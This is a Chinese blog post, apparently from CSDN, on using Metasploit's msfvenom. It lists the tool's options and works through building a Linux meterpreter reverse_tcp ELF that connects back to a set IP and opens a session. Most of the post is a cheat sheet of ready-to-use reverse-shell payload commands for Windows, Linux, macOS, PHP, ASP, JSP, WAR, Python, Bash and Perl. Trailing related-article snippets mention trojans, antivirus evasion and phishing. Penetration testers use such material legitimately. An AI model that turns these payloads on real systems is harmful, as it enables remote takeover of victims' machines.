Msfvenom的使用

最新推荐文章于 2025-05-10 00:00:00 发布
最新推荐文章于 2025-05-10 00:00:00 发布
阅读量1.2k 收藏 7
点赞数
分类专栏: 工具使用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42918771/article/details/104829794
版权

目录

1、初识 Msfvenom

Msfvenom是Metasploit独立的有效载荷生成器,也可以替代msfpayload和msfencode。

在这里插入图片描述

2、Msfvenom 使用

语法:
Msfvenom -p <payload> lhost=<ip> lport=<port> -f  <type>  -o <name.type>
例子:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

选项:
-l, --list            列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-p, --payload         选择一个需要生成的载荷(payload)
-f, --format          生成的文件格式
-e, --encoder         编码方式
-a, --arch            指定payload的目标架构(x86|x64|x86_64)
-o, --out             保存攻击payload
-b, --bad-chars       避免使用的字符 例如:不使用 ‘\x00\xff’
-n, --nopsled         提前给载荷(payload)设置一个长度为length的nopsled
-s, --space           产生有效载荷的长度
-i, --iterations      对载荷进行编码的次数
-c, --add-code        特别添加一个额外的win32外壳代码文件
-x, --template        指定要用作模板的自定义可执行文件(木马捆绑)
-k, --keep            保留模板行为并将有效载载作为新线程注入
-v, --var-name        为特定的输出格式指定一个自定义变量名
    --shellest        最小化生成payload
-t, --timeout         从STDIN读取有效负载时要等待的秒数
-h, --help            帮助  
    --help-formats    查看msf支持的输出格式列表

3、Msfvenom 例子

Msfvenom 生成 elf 可执行文件

1、 首先 Msfvenom 生成 elf 文件
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=172.16.200.139 lport=12345 -f elf -o 153.elf
在这里插入图片描述
2、然后MSF设置后对应的payload的参数,执行目标机器的payload成功获取session。在这里插入图片描述

4、Msfvenom 生成各种 Payload

Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Msfvenom使用指南
m0_57221101的博客
02-08 6368
参数总结 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f (- -help-formats) 输出文件格式。 (- -help-form
msfvenom的参数使用
xj28555的博客
08-08 1515
-l、 --list<type>列出[type]的所有模块。类型有:有效载荷、编码器、nop、平台、arch、encrypt、format、all -p、 --payload<payload>要使用的payload(--list payloads to list,--列出参数的选项)。为自定义指定“-”或STDIN --list options list——payload<value>的标准、高级和规避选项 -f、 --格式(使用格式>列表) -e、 --编
msfvenom 基本使用
blackguest07的博客
03-05 1904
msfvenom 基础命令
MSF 生成不同的木马 msfvenom 框架命令
最新发布
浩策盾悟
05-10 5335
msfvenom是Metasploit框架中的一个工具,用于生成各种类型的Payload(有效载荷),如木马、后门等,主要用于测试系统安全性。它支持多种编码方式、文件格式和平台。针对Windows平台,msfvenom可以生成EXE、VBS、PowerShell、DLL、Python等格式的木马,并可通过编码避免检测。对于Linux平台,它支持生成ELF、Bash、Python、Perl等格式的木马。此外,msfvenom还支持跨平台Payload生成,如Python和Ruby脚本。其他实用技巧包括生成多平
msfvenom的简单使用
jeff_true的博客
01-14 698
1,msfvenom -l | grep windows | grep x64 | grep tcp 2,msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.19.91.10 LPORT=4444 -f exe > shell.exe 将此exe文件传到目标靶机上(windows x64) 3,msfconsole use exploit/...
Msfvenom介绍及利用
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
Msfvenom的简单用法
热门推荐
Shanfenglan's blog
11-04 7万+
CATALOG1.常见高级参数2.常用生成载荷命令2.1 生成linux系统反向shell载荷2.2 生成windows系统载荷2.3 生成web类型载荷2.4 生成语言类载荷 1.常见高级参数 参数字段 效果 set PrependMigrate true 启用迁移进程(默认为:false) set PrependMigrateProc explorer.exe 迁移到此进程名:explorer.exe set SessionExpirationTimeout 0 会话超时时间0秒
msfvenom基本使用
02-24
以下是对 `msfvenom` 基本使用和相关知识点的详细解释: 1. **添加Payload**:`-p` 或 `--payload-options` 参数允许你选择要使用的payload类型。例如,`windows/meterpreter/reverse_tcp` 是一个常用的Windows平台...
钓鱼工具——msfvenom
weixin_59872639的博客
03-09 890
Msfvenom命令 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了。 (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f (- -help-formats) 输出文件格式。 (- -help-
msfvenom 生成php木马,利用msfvenom生成木马程序
weixin_36051235的博客
03-26 2013
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.二,工具:MSF三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线四,过程:1,查看帮助命令:root#msfvenom-h结果:2,生成meterpreterpayload并利用shikata_g...
msfvenom 使用
prettyX的博客
04-12 376
参考: https://blog.youkuaiyun.com/caiqiiqi/article/details/70768972 https://blog.youkuaiyun.com/whatday/article/details/82904623 比如,我们要生成一个在Linux平台下使用的elf,可以使用如下命令: msfvenom -p linux/x86/meterpreter_reverse...
msfvenom使用
A_Z_dd的博客
06-01 798
娱乐身心即可
网络攻防作业——Msfvenom使用
yyy7654321的博客
06-28 4226
2. 利用建立的监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等)。1.利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听;3.把生成的windows下可执行的exe文件复制到靶机。5.在靶机打开生成的abc.exe文件,开始监听。2. Msfvenom生成Payload。4.msfconsole开启监听。1.打开软件Msfvenom。6. 进行渗透测试操作。
【转】msfvenom使用指南
weixin_34146805的博客
10-22 528
msfvenom命令行选项如下: Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括...
msf的实战使用——msfvenom
tomyyyyy
05-11 3025
msf的实战使用——msfvenom 文章目录msf的实战使用——msfvenommsfvenom命令的参数常用命令木马免杀姿势1:Py2exe生成exe姿势2:PyInstaller生成exe姿势3:编译c源码 msfvenom命令的参数 Options: -l, --list <type> # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt,
msfvenom常见的使用命令
路baby的博客
06-24 3008
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线...
msfvenom
煮酒闲谈
09-22 4470
摘要在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以该博文记录一些关于msfvenom使用技巧。msfvenom:>>> msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 原理:msfvenom是msfp
msfvenom使用
2301_80361487的博客
01-21 642
坦白说查看器之类的,杀毒软件可能报毒,其。命令获取系统最高用户的权限,可以进一步渗透。个木马传给靶机,可以改一改名字,比如。3.等待受害者点击test.exe文件。上面启动一个终端执行以下命令。4.文件被受害者点击运行后,可以看到当前用户权限为。上面,运行后就可以在。输出文件到当前目录下。在这里,我们生成一个。文件夹下),控制端的。
msfvenom使用&免杀&外网渗透
`or 1 or 不正经の泡泡
03-13 7077
msfvenom的基本使用 这玩意是啥我就不介绍了,懂得都懂. 这篇博客将结合我本人的自身经验来说明大致的使用方式,这里的话只介绍,目前比较常用的几个方法和参数. payload 查看与使用 payload你可以理解为就是一种攻击的方案,生成何种攻击方式,对那种平台进行攻击 使用参数 -p来进行设置, 查看为-l payload具体的看如下案例 encoders的使用 参数 -e 这个是指选择何种方式编码,提高木马免杀的概率,此外还有参数 -i -b 不过有本人亲测使用-e即可,甚至不用指定,原因是无论你
使用ZSH自动补全msfvenom命令教程
"第三十课:解决msfvenom命令自动补全1" ...通过以上步骤,msfvenom使用将变得更加高效,避免了手动输入长命令和记忆众多参数的困扰。这对于经常使用msfvenom的渗透测试者和安全研究人员来说,无疑是一个很大的提升。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值